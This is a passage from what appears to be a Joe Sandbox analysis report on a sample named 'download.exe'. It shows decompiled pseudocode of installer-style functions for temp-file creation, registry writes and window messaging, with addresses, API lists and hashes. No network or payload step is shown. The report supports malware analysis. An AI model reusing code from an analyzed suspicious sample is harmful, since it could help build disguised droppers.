									goto L28;
								}
								_v8 = _v8 + _t100;
								goto L23;
							}
						}
						_push(0xfffffffc);
						goto L42;
					}
					goto L41;
				}
			}



























                                                      0x00402fa4
                                                      0x00402fa8
                                                      0x00402fab
                                                      0x00402fb0
                                                      0x00402fb2
                                                      0x00402fb2
                                                      0x00402fb9
                                                      0x00402fbd
                                                      0x00402fc2
                                                      0x00402fc4
                                                      0x00402fc4
                                                      0x00402fcb
                                                      0x00402fd0
                                                      0x00402fd2
                                                      0x00402fdb
                                                      0x00402fdb
                                                      0x00402fed
                                                      0x00403179
                                                      0x00403179
                                                      0x00000000
                                                      0x00402ff3
                                                      0x00402ff7
                                                      0x00403126
                                                      0x00403169
                                                      0x0040316b
                                                      0x0040316b
                                                      0x00403177
                                                      0x0040317e
                                                      0x00403181
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403177
                                                      0x0040312b
                                                      0x00000000
                                                      0x00000000
                                                      0x0040312d
                                                      0x00403130
                                                      0x00403133
                                                      0x00403136
                                                      0x00403138
                                                      0x00403138
                                                      0x00403148
                                                      0x00000000
                                                      0x00000000
                                                      0x0040314f
                                                      0x00403156
                                                      0x00403120
                                                      0x00403120
                                                      0x0040317b
                                                      0x0040317b
                                                      0x00000000
                                                      0x0040317b
                                                      0x00403158
                                                      0x0040315b
                                                      0x00403162
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403164
                                                      0x00000000
                                                      0x00403130
                                                      0x00403003
                                                      0x00403005
                                                      0x0040300c
                                                      0x0040300c
                                                      0x00403013
                                                      0x00403019
                                                      0x00403020
                                                      0x00403023
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00403029
                                                      0x00403029
                                                      0x00403029
                                                      0x00403031
                                                      0x00403033
                                                      0x00403033
                                                      0x00403044
                                                      0x00000000
                                                      0x00000000
                                                      0x0040304a
                                                      0x0040304d
                                                      0x00403053
                                                      0x00403059
                                                      0x00403059
                                                      0x00403064
                                                      0x0040306a
                                                      0x0040306f
                                                      0x00403076
                                                      0x00403079
                                                      0x00000000
                                                      0x00000000
                                                      0x0040307f
                                                      0x00403085
                                                      0x00403087
                                                      0x00403090
                                                      0x00403092
                                                      0x004030c0
                                                      0x004030c6
                                                      0x004030cf
                                                      0x004030d4
                                                      0x004030d4
                                                      0x004030d9
                                                      0x00403114
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004030db
                                                      0x004030df
                                                      0x004030f6
                                                      0x004030fb
                                                      0x004030fe
                                                      0x00403101
                                                      0x00403104
                                                      0x00403108
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x0040310e
                                                      0x004030e8
                                                      0x004030ef
                                                      0x00000000
                                                      0x00000000
                                                      0x004030f1
                                                      0x00000000
                                                      0x004030f1
                                                      0x004030d9
                                                      0x0040311c
                                                      0x00000000
                                                      0x0040311c
                                                      0x00000000
                                                      0x00403029

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CountTick$wsprintf
                                                      • String ID: ... %d%%
                                                      • API String ID: 551687249-2449383134
                                                      • Opcode ID: b11fd70d94a81fe884c456641f4daf6d98b7f28d8fc69cfe95d6e3ccae84ae35
                                                      • Instruction ID: a5b3666d5e6f2648317cea794876ab8fd5a8a7e10cba6e045702c7ef747b340d
                                                      • Opcode Fuzzy Hash: b11fd70d94a81fe884c456641f4daf6d98b7f28d8fc69cfe95d6e3ccae84ae35
                                                      • Instruction Fuzzy Hash: A6518E72901219ABCF10DF65DA44A9F7BB8EF08756F14413BE900BB2D0C7789E51CBA9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405B45 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 973 405b45-405b4f 974 405b50-405b7b GetTickCount GetTempFileNameA 973->974 975 405b8a-405b8c 974->975 976 405b7d-405b7f 974->976 978 405b84-405b87 975->978 976->974 977 405b81 976->977 977->978
                                                      C-Code - Quality: 100%
                                                      			E00405B45(char _a4, intOrPtr _a6, CHAR* _a8) {
				char _t11;
				signed int _t12;
				int _t15;
				signed int _t17;
				void* _t20;
				CHAR* _t21;

				_t21 = _a4;
				_t20 = 0x64;
				while(1) {
					_t11 =  *0x40a3b4; // 0x61736e
					_t20 = _t20 - 1;
					_a4 = _t11;
					_t12 = GetTickCount();
					_t17 = 0x1a;
					_a6 = _a6 + _t12 % _t17;
					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
					if(_t15 != 0) {
						break;
					}
					if(_t20 != 0) {
						continue;
					}
					 *_t21 =  *_t21 & 0x00000000;
					return _t15;
				}
				return _t21;
			}









                                                      0x00405b49
                                                      0x00405b4f
                                                      0x00405b50
                                                      0x00405b50
                                                      0x00405b55
                                                      0x00405b56
                                                      0x00405b59
                                                      0x00405b63
                                                      0x00405b70
                                                      0x00405b73
                                                      0x00405b7b
                                                      0x00000000
                                                      0x00000000
                                                      0x00405b7f
                                                      0x00000000
                                                      0x00000000
                                                      0x00405b81
                                                      0x00000000
                                                      0x00405b81
                                                      0x00000000

                                                      APIs
                                                      • GetTickCount.KERNEL32 ref: 00405B59
                                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,00000008,0000000A), ref: 00405B73
                                                      Strings
                                                      • nsa, xrefs: 00405B50
                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 00405B48
                                                      • "C:\Users\user\Desktop\download.exe", xrefs: 00405B45
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CountFileNameTempTick
                                                      • String ID: "C:\Users\user\Desktop\download.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                      • API String ID: 1716503409-4026104539
                                                      • Opcode ID: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                      • Instruction ID: e9fbc8f02783c34a78cbc278a62deb557e4d22a3c76f63b2365399c79cbf5e20
                                                      • Opcode Fuzzy Hash: 81a8a72dc23b4af90602e2553ee1124644ae594fa0167b908fb3a738e8e2aa10
                                                      • Instruction Fuzzy Hash: A0F082363042086BDB109F56ED04BAB7BA9DFA1760F14803BFA489B280D6B4A9548B58
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 706B16DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 94%
                                                      			E706B16DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				char _v88;
				struct HINSTANCE__* _t37;
				intOrPtr _t42;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t54;
				intOrPtr _t57;
				signed int _t61;
				signed int _t63;
				void* _t67;
				void* _t68;
				void* _t72;
				void* _t76;

				_t76 = __esi;
				_t68 = __edi;
				_t67 = __edx;
				 *0x706b405c = _a8;
				 *0x706b4060 = _a16;
				 *0x706b4064 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x706b4038, E706B1556);
				_push(1); // executed
				_t37 = E706B1A98(); // executed
				_t54 = _t37;
				if(_t54 == 0) {
					L28:
					return _t37;
				} else {
					if( *((intOrPtr*)(_t54 + 4)) != 1) {
						E706B226F(_t54);
					}
					E706B22B1(_t67, _t54);
					_t57 =  *((intOrPtr*)(_t54 + 4));
					if(_t57 == 0xffffffff) {
						L14:
						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t54 + 4)) == 0) {
								_t37 = E706B2498(_t54);
							} else {
								_push(_t76);
								_push(_t68);
								_t61 = 8;
								_t13 = _t54 + 0x818; // 0x818
								memcpy( &_v36, _t13, _t61 << 2);
								_t42 = E706B156B(_t54,  &_v88);
								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
								_t18 = _t54 + 0x818; // 0x818
								_t72 = _t18;
								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
								 *_t72 = 3;
								E706B2498(_t54);
								_t63 = 8;
								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
							}
						} else {
							E706B2498(_t54);
							_t37 = GlobalFree(E706B1266(E706B1559(_t54)));
						}
						if( *((intOrPtr*)(_t54 + 4)) != 1) {
							_t37 = E706B245E(_t54);
							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
								_t37 =  *(_t54 + 0x808);
								if(_t37 != 0) {
									_t37 = FreeLibrary(_t37);
								}
							}
							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
								_t37 = E706B14E2( *0x706b4058);
							}
						}
						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t54);
						}
					}
					_t48 =  *_t54;
					if(_t48 == 0) {
						if(_t57 != 1) {
							goto L14;
						}
						E706B2C83(_t54);
						L12:
						_t54 = _t48;
						L13:
						goto L14;
					}
					_t49 = _t48 - 1;
					if(_t49 == 0) {
						L8:
						_t48 = E706B29F8(_t57, _t54); // executed
						goto L12;
					}
					_t50 = _t49 - 1;
					if(_t50 == 0) {
						E706B2672(_t54);
						goto L13;
					}
					if(_t50 != 1) {
						goto L14;
					}
					goto L8;
				}
			}


















                                                      0x706b16db
                                                      0x706b16db
                                                      0x706b16db
                                                      0x706b16e5
                                                      0x706b16ed
                                                      0x706b16fa
                                                      0x706b1708
                                                      0x706b170b
                                                      0x706b170d
                                                      0x706b1712
                                                      0x706b1717
                                                      0x706b1836
                                                      0x706b1836
                                                      0x706b171d
                                                      0x706b1721
                                                      0x706b1724
                                                      0x706b1729
                                                      0x706b172b
                                                      0x706b1731
                                                      0x706b1737
                                                      0x706b1767
                                                      0x706b176e
                                                      0x706b1792
                                                      0x706b17dd
                                                      0x706b1794
                                                      0x706b1794
                                                      0x706b1795
                                                      0x706b179b
                                                      0x706b179c
                                                      0x706b17a6
                                                      0x706b17a9
                                                      0x706b17ae
                                                      0x706b17b5
                                                      0x706b17b5
                                                      0x706b17bc
                                                      0x706b17c2
                                                      0x706b17c8
                                                      0x706b17d5
                                                      0x706b17d6
                                                      0x706b17d9
                                                      0x706b1770
                                                      0x706b1771
                                                      0x706b1786
                                                      0x706b1786
                                                      0x706b17e7
                                                      0x706b17ea
                                                      0x706b17f7
                                                      0x706b17fe
                                                      0x706b1806
                                                      0x706b1809
                                                      0x706b1809
                                                      0x706b1806
                                                      0x706b1816
                                                      0x706b181e
                                                      0x706b1823
                                                      0x706b1816
                                                      0x706b182b
                                                      0x00000000
                                                      0x706b182d
                                                      0x00000000
                                                      0x706b182e
                                                      0x706b182b
                                                      0x706b173b
                                                      0x706b173e
                                                      0x706b175c
                                                      0x00000000
                                                      0x00000000
                                                      0x706b175f
                                                      0x706b1764
                                                      0x706b1764
                                                      0x706b1766
                                                      0x00000000
                                                      0x706b1766
                                                      0x706b1740
                                                      0x706b1741
                                                      0x706b1749
                                                      0x706b174a
                                                      0x00000000
                                                      0x706b174a
                                                      0x706b1743
                                                      0x706b1744
                                                      0x706b1752
                                                      0x00000000
                                                      0x706b1752
                                                      0x706b1747
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x706b1747

                                                      APIs
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CE7
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CEC
                                                        • Part of subcall function 706B1A98: GlobalFree.KERNEL32(?), ref: 706B1CF1
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B1786
                                                      • FreeLibrary.KERNEL32(?), ref: 706B1809
                                                      • GlobalFree.KERNEL32(00000000), ref: 706B182E
                                                        • Part of subcall function 706B226F: GlobalAlloc.KERNEL32(00000040,?), ref: 706B22A0
                                                        • Part of subcall function 706B2672: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,706B1757,00000000), ref: 706B2742
                                                        • Part of subcall function 706B156B: wsprintfA.USER32 ref: 706B1599
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1880663434.00000000706B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 706B0000, based on PE: true
                                                      • Associated: 00000002.00000002.1880594487.00000000706B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880732550.00000000706B3000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      • Associated: 00000002.00000002.1880781272.00000000706B5000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_706b0000_download.jbxd
                                                      Similarity
                                                      • API ID: Global$Free$Alloc$Librarywsprintf
                                                      • String ID:
                                                      • API String ID: 3962662361-3916222277
                                                      • Opcode ID: 823b0e4e18a9f4268ea2859f8886292012b1a83f0130fea1d2d61ef45dfba692
                                                      • Instruction ID: 5be67cbce42aa45c9ace839a85accce3ed524eedc5a12fcff78b6ed371b218bd
                                                      • Opcode Fuzzy Hash: 823b0e4e18a9f4268ea2859f8886292012b1a83f0130fea1d2d61ef45dfba692
                                                      • Instruction Fuzzy Hash: 764180F2100249AACB41AF64CDA5BDD37EEBB05210FB48538F9069E2D6DF789545C7A0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00401C0A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 59%
                                                      			E00401C0A(intOrPtr __edx) {
				int _t29;
				long _t30;
				signed int _t32;
				CHAR* _t35;
				long _t36;
				int _t41;
				signed int _t42;
				int _t46;
				int _t56;
				intOrPtr _t57;
				struct HWND__* _t61;
				void* _t64;

				_t57 = __edx;
				_t29 = E00402AA9(3);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 - 8) = _t29;
				_t30 = E00402AA9(4);
				 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
				 *(_t64 + 8) = _t30;
				if(( *(_t64 - 0x14) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 8)) = E00402ACB(0x33);
				}
				__eflags =  *(_t64 - 0x14) & 0x00000002;
				if(( *(_t64 - 0x14) & 0x00000002) != 0) {
					 *(_t64 + 8) = E00402ACB(0x44);
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x2c)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t59 = E00402ACB();
					_t32 = E00402ACB();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t35 =  ~( *_t31) & _t59;
					__eflags = _t35;
					_t36 = FindWindowExA( *(_t64 - 8),  *(_t64 + 8), _t35,  ~( *_t32) & _t32); // executed
					goto L10;
				} else {
					_t61 = E00402AA9();
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t41 = E00402AA9(2);
					 *((intOrPtr*)(_t64 - 0x3c)) = _t57;
					_t56 =  *(_t64 - 0x14) >> 2;
					if(__eflags == 0) {
						_t36 = SendMessageA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8));
						L10:
						 *(_t64 - 0xc) = _t36;
					} else {
						_t42 = SendMessageTimeoutA(_t61, _t41,  *(_t64 - 8),  *(_t64 + 8), _t46, _t56, _t64 - 0xc);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t64 - 0x28)) - _t46;
				if( *((intOrPtr*)(_t64 - 0x28)) >= _t46) {
					_push( *(_t64 - 0xc));
					E00405EDB();
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *((intOrPtr*)(_t64 - 4));
				return 0;
			}















                                                      0x00401c0a
                                                      0x00401c0c
                                                      0x00401c13
                                                      0x00401c16
                                                      0x00401c19
                                                      0x00401c23
                                                      0x00401c27
                                                      0x00401c2a
                                                      0x00401c33
                                                      0x00401c33
                                                      0x00401c36
                                                      0x00401c3a
                                                      0x00401c43
                                                      0x00401c43
                                                      0x00401c46
                                                      0x00401c4a
                                                      0x00401c4c
                                                      0x00401ca1
                                                      0x00401ca3
                                                      0x00401cac
                                                      0x00401cb4
                                                      0x00401cb7
                                                      0x00401cb7
                                                      0x00401cc0
                                                      0x00000000
                                                      0x00401c4e
                                                      0x00401c55
                                                      0x00401c57
                                                      0x00401c5a
                                                      0x00401c60
                                                      0x00401c67
                                                      0x00401c6a
                                                      0x00401c92
                                                      0x00401cc6
                                                      0x00401cc6
                                                      0x00401c6c
                                                      0x00401c7a
                                                      0x00401c82
                                                      0x00401c85
                                                      0x00401c85
                                                      0x00401c6a
                                                      0x00401cc9
                                                      0x00401ccc
                                                      0x00401cd2
                                                      0x004028ff
                                                      0x004028ff
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C7A
                                                      • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C92
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Timeout
                                                      • String ID: !
                                                      • API String ID: 1777923405-2657877971
                                                      • Opcode ID: 923bedeed5d7b8d7984d68c2ba9ede72919c9759eaf6e2c39352329f0efb5f52
                                                      • Instruction ID: 435bc4df3b74c2d8df546d11ce2c7183e26475550abba04b2436001ae32cf151
                                                      • Opcode Fuzzy Hash: 923bedeed5d7b8d7984d68c2ba9ede72919c9759eaf6e2c39352329f0efb5f52
                                                      • Instruction Fuzzy Hash: 4B21A271E44209BEEF15DFA5D986AAD7BB4EF84304F24843EF501B61E0CB7885418F28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004023D6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64registrystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 83%
                                                      			E004023D6(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t18;
				void* _t19;
				int _t22;
				long _t23;
				int _t28;
				intOrPtr _t31;
				void* _t32;
				intOrPtr _t35;
				void* _t37;
				void* _t40;

				_t31 = __edx;
				_t28 = __ebx;
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				_t32 = __eax;
				 *(_t37 - 0x3c) =  *(_t37 - 0x14);
				 *(_t37 - 0x34) = E00402ACB(2);
				_t18 = E00402ACB(0x11);
				 *(_t37 - 4) = 1;
				_t19 = E00402B5B(_t40, _t32, _t18, 2); // executed
				 *(_t37 + 8) = _t19;
				if(_t19 != __ebx) {
					_t22 = 0;
					if(_t35 == 1) {
						E00402ACB(0x23);
						_t22 = lstrlenA(0x40abe8) + 1;
					}
					if(_t35 == 4) {
						 *0x40abe8 = E00402AA9(3);
						 *((intOrPtr*)(_t37 - 0x80)) = _t31;
						_t22 = _t35;
					}
					if(_t35 == 3) {
						_t22 = E00402F9C( *((intOrPtr*)(_t37 - 0x1c)), _t28, 0x40abe8, 0xc00); // executed
					}
					_t23 = RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x34), _t28,  *(_t37 - 0x3c), 0x40abe8, _t22); // executed
					if(_t23 == 0) {
						 *(_t37 - 4) = _t28;
					}
					_push( *(_t37 + 8));
					RegCloseKey(); // executed
				}
				 *0x7a2fe8 =  *0x7a2fe8 +  *(_t37 - 4);
				return 0;
			}













                                                      0x004023d6
                                                      0x004023d6
                                                      0x004023d6
                                                      0x004023d9
                                                      0x004023e0
                                                      0x004023ea
                                                      0x004023ed
                                                      0x004023f6
                                                      0x004023fd
                                                      0x00402404
                                                      0x00402407
                                                      0x0040240d
                                                      0x00402417
                                                      0x0040241b
                                                      0x00402426
                                                      0x00402426
                                                      0x0040242a
                                                      0x00402434
                                                      0x0040243a
                                                      0x0040243d
                                                      0x0040243d
                                                      0x00402441
                                                      0x0040244d
                                                      0x0040244d
                                                      0x0040245e
                                                      0x00402466
                                                      0x00402468
                                                      0x00402468
                                                      0x0040246b
                                                      0x00402542
                                                      0x00402542
                                                      0x0040295a
                                                      0x00402966

                                                      APIs
                                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000023,?,00000000,00000002,00000011,00000002), ref: 00402421
                                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 0040245E
                                                      • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nse224D.tmp,00000000,?,00000000,00000002,00000011,00000002), ref: 00402542
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1796335749.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000002.00000002.1796282530.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796418503.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.000000000077B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000785000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.0000000000787000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007AE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1796470096.00000000007C6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                      • Associated: 00000002.00000002.1798213099.00000000007C7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_400000_download.jbxd
                                                      Similarity
                                                      • API ID: CloseValuelstrlen
                                                      • String ID: C:\Users\user\AppData\Local\Temp\nse224D.tmp
                                                      • API String ID: 2655323295-2797120381
                                                      • Opcode ID: a255093a8ed6f72dffe291aa6522cbdc2aa9f68222cbeac447eaed5d135dc8b8
                                                      • Instruction ID: b9f9fe5e010ce9562f7769f0650a0fc1c691aa098229d6fee64222e6c9067592
                                                      • Opcode Fuzzy Hash: a255093a8ed6f72dffe291aa6522cbdc2aa9f68222cbeac447eaed5d135dc8b8
                                                      • Instruction Fuzzy Hash: 29119371E00215BEDB10EFA5DE49EAEBA74EB54318F20843BF504F71D1C6B94D419B28
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405A03 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46stringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 53%
                                                      			E00405A03(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				void* _t22;

				E00405F7D(0x7a0948, _a4);
				_t21 = E004059AE(0x7a0948);
				if(_t21 != 0) {
					E004061E7(_t21);
					if(( *0x7a2f5c & 0x00000080) == 0) {
						L5:
						_t22 = _t21 - 0x7a0948;
						while(1) {
							_t11 = lstrlenA(0x7a0948);
							_push(0x7a0948);
							if(_t11 <= _t22) {
								break;
							}
							_t12 = E00406280();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E0040595C(0x7a0948);
								continue;
							} else {
								goto L1;
							}
						}
						E00405915();
						_t16 = GetFileAttributesA(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                      0x00405a0f
                                                      0x00405a1a
                                                      0x00405a1e
                                                      0x00405a25
                                                      0x00405a31
                                                      0x00405a3d
                                                      0x00405a3d
                                                      0x00405a55
                                                      0x00405a56
                                                      0x00405a5d
                                                      0x00405a5e
                                                      0x00000000
                                                      0x00000000
                                                      0x00405a41
                                                      0x00405a48
                                                      0x00405a50
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00405a48
                                                      0x00405a60
                                                      0x00405a66
                                                      0x00000000
                                                      0x00405a74
